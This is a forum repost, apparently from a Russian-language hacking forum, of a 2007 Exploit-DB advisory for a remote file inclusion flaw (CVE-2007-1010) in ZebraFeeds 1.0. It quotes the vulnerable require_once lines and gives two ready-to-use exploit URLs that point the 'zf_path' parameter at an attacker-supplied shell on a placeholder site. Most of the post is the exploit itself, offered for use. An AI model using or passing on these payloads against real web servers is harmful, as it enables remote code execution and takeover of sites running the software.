ZebraFeeds 1.0 - 'zf_path' Remote File Inclusion | Gerki | Теневой Форум про Заработок и ИБ

Exploiter

Хакер

21 Дек 2022

EDB-ID: 3314

Проверка EDB

Пройдено

Автор: THE DE@TH

Тип уязвимости: WEBAPPS

Платформа: PHP

CVE: cve-2007-1010

Дата публикации: 2007-02-15

Код:

To ConTacT mE @ wWw.Asb-May.net/bb
ScRiPt:-http://cazalet.org/zebrafeeds/releases/zebrafeeds-current.zip
Discovered By:- ThE dE@Th <<{AsB-MaY DiScOvEr ExPlIoTs Gr0uP}>>
******************************************************************************
aggregator.php:-
require_once($zf_path . 'includes/feed.php');
require_once($zf_path . 'includes/view.php');
require_once($zf_path . 'includes/template.php');
require_once($zf_path . 'magpierss/rss_fetch.inc');

controller.php:-
require_once($zf_path . 'includes/template.php');
require_once($zf_path . 'includes/opml.php');

********************************************************************************
ExPlOiT:-http://www.SitE.com/newsfeeds/includes/aggregator.php?zf_path=[Shell]
ExPlOiT:-http://www.SitE.com/newsfeeds/includes/controller.php?zf_path=[Shell]
*******************************************************************************

# milw0rm.com [2007-02-15]

Источник: www.exploit-db.com

Поиск

Exploit ZebraFeeds 1.0 - 'zf_path' Remote File Inclusion

Exploiter

Похожие темы